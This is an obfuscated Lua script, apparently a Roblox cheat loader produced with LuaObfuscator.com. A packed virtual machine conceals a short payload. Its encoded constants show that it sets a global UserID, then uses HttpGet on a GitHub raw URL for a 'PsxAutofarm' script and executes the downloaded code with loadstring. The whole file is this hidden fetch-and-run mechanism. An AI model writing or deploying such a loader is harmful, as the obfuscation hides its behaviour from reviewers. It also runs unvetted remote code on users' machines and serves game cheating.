--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (2==v18) then v23=function()local v39=(232 + 15) -(44 + 121 + 82);local v40;local v41;while true do if (v39==(558 -(375 + 182))) then return (v41 * (1372 -(1109 + 7))) + v40;end if (v39==(1409 -(1393 + 16))) then v40,v41=v1(v16,v19,v19 + (699 -(446 + 251)));v19=v19 + (7 -5) + 0;v39=1;end end end;v24=nil;v24=function()local v42,v43,v44,v45=v1(v16,v19,v19 + (873 -((2117 -1524) + 277)));v19=v19 + ((779 + 1187) -(967 + 995));return (v45 * 16777216) + (v44 * (47977 + 17559)) + (v43 * 256) + v42;end;v25=nil;v18=3;end if (v18==5) then v30=nil;v30=function(v31,v32,v33)local v46=v31[1];local v47=v31[2];local v48=v31[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1;local function v72()local v75=v46;local v76=v47;local v77=v48;local v78=v28;local v79={};local v80={};local v81={};for v91=0 -0,v71 do if ((3414<=(4062 + 532)) and (v91>=v77)) then v79[v91-v77]=v70[v91 + 1 + 0];else v81[v91]=v70[v91 + 1 + 0];end end local v82=(v71-v77) + (1 -0);local v83;local v84;while true do local v92=0 -0;local v93;local v94;while true do if (((4203 + 747)>(2071 + 2756)) and (v92==(0 + 0))) then v93=0 + 0;v94=nil;v92=1503 -(972 + (1260 -730));end if ((v92==1) or ((4639 -(195 + 986))<=(2560 -((2653 -(600 + 1008)) + 488)))) then while true do if (((1889 -857)<(1219 -(15 + 5))) and (v93==(1295 -(350 + 945)))) then v94=0 -0;while true do if (((2776 -2079)<(1895 + 2211)) and (v94==(0 + 0))) then local v106=(350 + 527) -(532 + 345);local v107;while true do if ((1609<=((3514 -(227 + 898)) -(202 + (562 -(173 + 254))))) and ((0 -0)==v106)) then v107=0 -0;while true do if (((5505 -3607)>=(139 -(39 + 60))) and ((1655 -(1183 + 472))==v107)) then local v113=0 -0;while true do if (((3313 -(628 + 256 + 787))<=3574) and (v113==(3 -2))) then v107=(1230 -(836 + 242)) -(12 + 139);break;end if (((1241 -(1054 + 187))==v113) or (((9584 -4150) -1381)>(337 + 4525))) then v83=v75[v68];v84=v83[3 -2];v113=1;end end end if (((17916 -13018)>(3143 + 100)) and (v107==(1 + 0))) then v94=1;break;end end break;end end end if ((v94==((2 + 0) -1)) or (((1419 + 2078) -1371)>=(2183 + 384))) then if ((v84<=(246 -(107 + 135))) or ((4742 -822)<=(3590 -(448 + 368)))) then if ((v84<=(2 -1)) or ((8408 -5539)<(510 + 1892))) then if ((v84==(0 + 0)) or (3844<(6210 -2759))) then v81[v83[2 + 0]]();else local v114=0 -0;local v115;local v116;local v117;local v118;local v119;local v120;while true do if (((3720 -(90 + 951))<=(1021 + 1704)) and (v114==(9 -7))) then v119=nil;v120=nil;v114=3;end if ((2262<=3951) and (v114==1)) then v117=nil;v118=nil;v114=2;end if ((((15429 -10794) -((1765 -(128 + 654)) + 162))<(3769 + 286)) and (v114==(3 + 0))) then while true do if ((v115==(1280 -(570 + 710))) or (986>=(8326 -4227))) then local v156=0 + 0;while true do if (((1475 -(27 + 259 + 1188))==v156) or ((15133 -11086)>=(9679 -4781))) then v115=197 -(4 + 192);break;end if ((v156==(199 -(112 + 87))) or ((2777 -(168 + 303))<=1445)) then v116=0 -0;v117=nil;v156=1 + 0;end end end if ((v115==(289 -(196 + 92))) or (2216>(13608 -10301))) then local v157=0 + 0;while true do if ((v157==(942 -((289 -(158 + 122)) + 933))) or ((5817 -2373)<=3025)) then v118=nil;v119=nil;v157=1;end if ((((1723 -(1040 + 416)) + 242)<=(937 + 2540)) and (v157==1)) then v115=721 -(234 + 485);break;end end end if ((v115==(4 -(1844 -(174 + 1668)))) or ((3222 -(703 + 458))>=(6039 -1903))) then v120=nil;while true do if (((4032 -2045)<(5032 -(56 + (981 -250)))) and (v116==(1 -0))) then local v163=0;local v164;while true do if ((v163==(0 -0)) or (1736<=1271)) then v164=0 + 0;while true do if (((8791 -6263)>=((1653 + 34) -((1549 -(774 + 692)) + 471))) and (v164==(1 + 0))) then v116=3 -1;break;end if (((7179 -2265)>=(3561 -(655 + 512))) and (v164==((667 -(190 + 477)) + 0))) then local v183=0;while true do if (((1824 -(148 + 537 + 651))<(9792 -5654)) and (0==v183)) then v69=(v119 + v117) -((712 -(190 + 29)) -((1184 -(297 + 575)) + 180));v120=0;v183=1867 -(1393 + 473);end if ((v183==1) or (2442>(1326 + 2013))) then v164=1;break;end end end end break;end end end if ((v116==(4 -(2 + 0))) or ((607 + 476)>=(13922 -9812))) then for v173=v117,v69 do local v174=0 + 0;local v175;local v176;while true do if ((583==((1017 -(112 + 105)) -(186 + 31))) and ((0 -0)==v174)) then v175=1123 -(894 + 229);v176=nil;v174=1;end if (((7501 -3626)>(1583 + 1457)) and (v174==(2 -1))) then while true do if (((2136 -(377 + 970))<=(842 + 276)) and (v175==(35 -(24 + 11)))) then v176=0 + 0;while true do if ((v176==(723 -(641 + 82))) or ((1898 + 668)<(620 + 1038))) then v120=v120 + ((2604 -(211 + 1469)) -(35 + 888));v81[v173]=v118[v120];break;end end break;end end break;end end end break;end if (((1449 -528)<=3666) and (v116==(0 -0))) then local v165=0 + 0;local v166;while true do if ((v165==(1415 -((1695 -(521 + 121)) + 362))) or ((601 + 382 + 781)==(4775 -(449 + 1039)))) then v166=0 -(0 + 0);while true do if ((v166==(0 -(0 + 0))) or ((357 + (1839 -(607 + 689)))<=(1790 -1093))) then local v184=0;while true do if (((7125 -3713)>(895 + 755)) and (v184==(0 + 0))) then v117=v83[2 -0];v118,v119=v78(v81[v117](v13(v81,v117 + (681 -(508 + 172)),v83[1524 -(1047 + 474)])));v184=1 + (339 -(191 + 148));end if ((v184==1) or ((8206 -4671)>=((51419 -40975) -6649))) then v166=3 -2;break;end end end if ((((5748 -2423) -(713 + 641))==1971) and (v166==(1 + (1585 -(927 + 658))))) then v116=3 -2;break;end end break;end end end end break;end end break;end if ((v114==(0 + 0)) or ((2162 -(916 + 187))>(3137 -(660 + 1215)))) then v115=0 + 0;v116=nil;v114=2 -1;end end end elseif ((303>(1303 -(1672 -630))) and (v84<=(2 + 0))) then if ((v81[v83[498 -(401 + 95)]]==v83[2 + 2]) or ((3843 -(925 + 50 + 657))>4782)) then v68=v68 + 1;else v68=v83[3 + 0];end elseif ((v84>3) or ((3674 + 35 + 0)>(1362 + 2811))) then v81[v83[7 -5]][v83[3]]=v83[5 -1];else local v137=0 -0;local v138;local v139;local v140;local v141;while true do if ((2767<3830) and (v137==0)) then v138=0 + 0;v139=nil;v137=1983 -(806 + (5791 -4615));end if (((8366 -4861)==(1892 + 1613)) and (v137==(1 + 0))) then v140=nil;v141=nil;v137=7 -5;end if ((v137==((256 -(131 + 119)) -4)) or (2543==3753)) then while true do if ((v138==(1 + 0)) or ((2826 -(238 + 1361))>=(6781 -4380))) then v141=nil;while true do if ((((34824 -24755) -5230)==4839) and (v139==(1090 -(940 + 150)))) then local v177=0 + 0;local v178;while true do if ((v177==(0 -0)) or ((936 + 3711)<=(1377 + 1534))) then v178=0 + 0;while true do if (((2053 + 1108)<(6414 -(359 + 196 + 907))) and (v178==(1 + 0 + 0))) then v139=1 -0;break;end if (((983 -(265 + 240))<=3994) and ((0 + 0)==v178)) then local v185=0;while true do if ((v185==(0 -0)) or ((4914 -(138 + 86))<=(5817 -2958))) then v140=v83[1 + 1];v141=v81[v83[1 + (9 -7)]];v185=2 -(1 + 0);end if ((v185==(1355 -(123 + 107 + 1124))) or ((3200 -977)<=(242 + 91))) then v178=(702 -(224 + 477)) + (1446 -(566 + 880));break;end end end end break;end end end if ((v139==(4 -3)) or (3927<(2089 -(1 + 11 + 15)))) then v81[v140 + (462 -(456 + 5))]=v141;v81[v140]=v141[v83[4]];break;end end break;end if (((824 -(649 + (1192 -(799 + 218))))==v138) or ((5764 -(890 + (2270 -(496 + 752))))>=4292)) then local v160=466 -((1117 -757) + 106);while true do if (((1931 + 32)<(2810 + 1714)) and (v160==(1 + 0))) then v138=1 + 0;break;end if ((v160==((2569 -(58 + 694)) -(1376 + 70 + 371))) or (1991>=(2491 + 1523))) then v139=290 -(111 + 179);v140=nil;v160=(888 -(717 + 170)) -0;end end end end break;end end end elseif (((4678 + 61)>=(1632 + 682)) and (v84<=7)) then if ((v84<=(144 -(39 + 100))) or (4688<(811 -306))) then v81[v83[6 -4]]=v83[1199 -(1011 + 185)];elseif ((v84>(13 -7)) or ((255 + 3847)==(767 -440))) then do return;end else local v142=0;local v143;local v144;while true do if ((2127>=(3125 -(4080 -(281 + 1320)))) and (v142==0)) then v143=427 -(98 + 329);v144=nil;v142=1956 -(220 + 384 + 1351);end if ((v142==(691 -(471 + 219))) or (((3622 -2694) -(20 + (140 -(57 + 36))))>=(812 + 1856))) then while true do if (((2290 -(210 + 436 + 834))<=(5710 -(275 + 917))) and (v143==(0 + 0))) then v144=v83[2];v81[v144]=v81[v144](v13(v81,v144 + (1656 -(884 + 771)) + 0,v69));break;end end break;end end end elseif (((2737 -((2243 -(22 + 503)) + 121))==(2517 -(879 + 740))) and (v84<=(3 + (14 -9)))) then for v124=v83[1404 -(838 + 564)],v83[1 + 2] do v81[v124]=nil;end elseif ((1999<(689 + 1437)) and (v84==(872 -(737 + 126)))) then v68=v83[3];else v81[v83[1008 -(937 + 69)]]=v33[v83[1835 -(380 + 1452)]];end v68=v68 + (1 -0);break;end end break;end end break;end end end end A,B=v28(v11(v72));if  not A[1] then local v95=0;local v96;while true do if (v95==0) then v96=v31[4][v68] or "?";error("Script error at ["   .. v96   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v49=0;local v50;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v49==1) then v52=nil;v53=nil;v49=2;end if (v49==(923 -(330 + 593))) then v50=0;v51=nil;v49=1 -0;end if (v49==4) then while true do if (v50==(2 -0)) then local v101=0;while true do if (1==v101) then v50=3;break;end if (v101==(0 -0)) then v55=nil;v56=nil;v101=1;end end end if (v50==(1 + 2)) then v57=nil;while true do local v103=0;while true do if (v103==(0 + 0)) then local v105=56 -(32 + 24);while true do if (v105~=(3 -2)) then else v103=1;break;end if (v105==(0 + 0)) then if (v51~=3) then else local v111=0 -0;while true do if (v111==1) then return v55;end if (v111==(0 -0)) then for v126=1,v24() do v53[v126-1]=v29();end for v128=1,v24() do v54[v128]=v24();end v111=1 + 0;end end end if (v51~=2) then else local v112=1225 -(663 + 562);while true do if (v112~=1) then else for v130=2 -1,v24() do local v131=0 + 0;local v132;local v133;while true do if (v131==1) then while true do if (v132~=(0 -0)) then else v133=v22();if (v21(v133,617 -(297 + 319),1)~=0) then else local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (v167~=0) then else v168=1331 -(335 + 996);v169=nil;v167=2 -1;end if (v167~=1) then else local v182=940 -(252 + 688);while true do if (v182==1) then v167=2;break;end if ((0 -0)==v182) then v170=nil;v171=nil;v182=1;end end end if (v167==2) then v172=nil;while true do if (0==v168) then v169=0 + 0;v170=nil;v168=1;end if (v168==(1 + 1)) then while true do if (v169==(0 + 0)) then local v187=0;local v188;local v189;while true do if (v187~=1) then else while true do if (v188==0) then v189=0 -0;while true do if (v189==1) then v169=1 -0;break;end if ((0 + 0)==v189) then local v207=0 + 0;while true do if (v207==1) then v189=1;break;end if (v207==(0 + 0)) then v170=v21(v133,1221 -(104 + 1115),596 -(435 + 158));v171=v21(v133,4,6);v207=1;end end end end break;end end break;end if (v187==(1227 -(576 + 651))) then v188=0;v189=nil;v187=1 + 0;end end end if ((1 + 1)~=v169) then else local v190=0;while true do if (v190==(0 + 0)) then local v199=0 + 0;while true do if (v199==0) then if (v21(v171,1 + 0,1 + 0)==(1 + 0)) then v172[5 -3]=v57[v172[2 -0]];end if (v21(v171,5 -3,2)~=1) then else v172[3]=v57[v172[3]];end v199=1;end if (v199==(2 -1)) then v190=1 + 0;break;end end end if (v190==(3 -2)) then v169=5 -2;break;end end end if (v169==1) then local v191=0 -0;while true do if (v191~=1) then else v169=3 -1;break;end if (v191==0) then v172={v23(),v23(),nil,nil};if (v170==0) then local v200=0;local v201;while true do if (v200~=0) then else v201=0;while true do if (v201==(0 -0)) then v172[8 -5]=v23();v172[1785 -(786 + 995)]=v23();break;end end break;end end elseif (v170==1) then v172[582 -(98 + 481)]=v24();elseif (v170==(640 -(87 + 551))) then v172[3]=v24() -(2^(1 + 15));elseif (v170==(10 -7)) then local v211=0;local v212;while true do if (v211==0) then v212=0;while true do if (v212~=0) then else v172[3]=v24() -(2^(12 + 4));v172[476 -(114 + 358)]=v23();break;end end break;end end end v191=1;end end end if (v169==(6 -3)) then if (v21(v171,13 -10,3)==(2 -1)) then v172[568 -(411 + 153)]=v57[v172[4]];end v52[v130]=v172;break;end end break;end if (v168~=(954 -(811 + 142))) then else v171=nil;v172=nil;v168=2 + 0;end end break;end end end break;end end break;end if (v131==(0 + 0)) then local v151=0;while true do if (v151==1) then v131=1;break;end if (v151==(764 -(162 + 602))) then v132=0;v133=nil;v151=2 -1;end end end end end v51=3;break;end if (v112==0) then local v123=1110 -(148 + 962);while true do if (v123==(1 + 0)) then v112=1;break;end if (v123~=0) then else for v152=1 + 0,v56 do local v153=0;local v154;local v155;while true do if (v153~=0) then else local v158=1875 -(993 + 882);while true do if (v158~=(0 -0)) then else v154=v22();v155=nil;v158=1 + 0;end if (v158~=1) then else v153=1 + 0;break;end end end if (v153~=(1 -0)) then else if (v154==(1174 -(1013 + 160))) then v155=v22()~=(651 -(8 + 643));elseif (v154==(1 + 1)) then v155=v25();elseif (v154~=(5 -2)) then else v155=v26();end v57[v152]=v155;break;end end end v55[3]=v22();v123=1;end end end end end v105=1 + 0;end end end if ((758 -(726 + 31))==v103) then if (v51==1) then local v108=0 + 0;while true do if ((1 + 0)~=v108) then else v57={};v51=2;break;end if (v108~=(499 -(455 + 44))) then else v55={v52,v53,nil,v54};v56=v24();v108=1;end end end if (v51==(1004 -(607 + 397))) then local v109=0 + 0;local v110;while true do if (v109~=(0 + 0)) then else v110=0;while true do if (v110==1) then v54={};v51=1;break;end if (v110==0) then v52={};v53={};v110=1 -0;end end break;end end end break;end end end break;end if (v50==(0 + 0)) then local v102=1417 -(945 + 472);while true do if (v102~=0) then else v51=0 + 0;v52=nil;v102=1;end if (v102==1) then v50=1;break;end end end if (v50~=(3 -2)) then else v53=nil;v54=nil;v50=2;end end break;end if (v49~=(535 -(270 + 263))) then else v54=nil;v55=nil;v49=9 -6;end if (v49~=(3 + 0)) then else v56=nil;v57=nil;v49=450 -(313 + 133);end end end;v18=5;end if (v18==1) then v21=function(v34,v35,v36)if v36 then local v85=274 -(94 + 180);local v86;while true do if (((1658 + 307) -(462 + 1503))==v85) then v86=(v34/((450 -(40 + 408))^(v35-1)))%((1 + 1)^(((v36-(2 -1)) -(v35-(1 + 0))) + (476 -(135 + 340))));return v86-(v86%1);end end else local v87=(2 -0)^(v35-(992 -(678 + 313)));return (((v34%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0);end end;v22=nil;v22=function()local v58=v1(v16,v19,v19);v19=v19 + 1;return v58;end;v23=nil;v18=2;end if (v18==3) then v25=function()local v59=1298 -(211 + 1087);local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==(1 + 2)) then if (v64==(0 + 0)) then if (v63==(0 -0)) then return v65 * (0 + 0);else v64=4 -3;v62=1800 -(1632 + 168);end elseif (v64==(5545 -3498)) then return ((v63==(0 + (0 -0))) and (v65 * ((1 + 0)/(30 -(22 + 8))))) or (v65 * NaN);end return v8(v65,v64-(2568 -1545)) * (v62 + (v63/((1 + 1)^(107 -(16 + 39)))));end if (v59==(0 + 0)) then v60=v24();v61=v24();v59=971 -(211 + 45 + 714);end if (v59==(5 -3)) then v64=v21(v61,493 -(12 + 460),(195 + 46) -(52 + 158));v65=((v21(v61,19 + 13)==(1 + 0)) and  -(938 -(668 + (1965 -(810 + 886))))) or (1211 -(4 + 1206));v59=1430 -(35 + 1392);end if (v59==(2 -1)) then v62=(130 -(8 + 121)) + 0;v63=(v21(v61,4 -3,1288 -(394 + 874)) * ((7 -5)^((196 -139) -25))) + v60;v59=6 -4;end end end;v26=nil;v26=function(v37)local v66;if  not v37 then v37=v24();if (v37==(0 -0)) then return "";end end v66=v3(v16,v19,(v19 + v37) -(1391 -(993 + 397)));v19=v19 + v37;local v67={};for v73=1415 -(1156 + 258), #v66 do v67[v73]=v2(v1(v3(v66,v73,v73)));end return v6(v67);end;v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v38,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v38,16));if v20 then local v104=v5(v90,v20);v20=nil;return v104;else return v90;end break;end end end end);v21=nil;v18=1;end end end v15("LOL!083O00028O0003023O005F4703063O00557365724944023O00585F199B41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403553O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53696C656E6365536372697074732F507378536372697074732E4C75612F6D61696E2F5073784175746F6661726D2E7472756500153O0012053O00014O0008000100013O0026023O0002000100010004093O00020001001205000100013O00260200010005000100010004093O0005000100120A000200023O00300400020003000400120A000200053O00120A000300063O002003000300030007001205000500084O0001000300054O000600023O00024O0002000100010004093O001400010004093O000500010004093O001400010004093O000200012O00073O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end

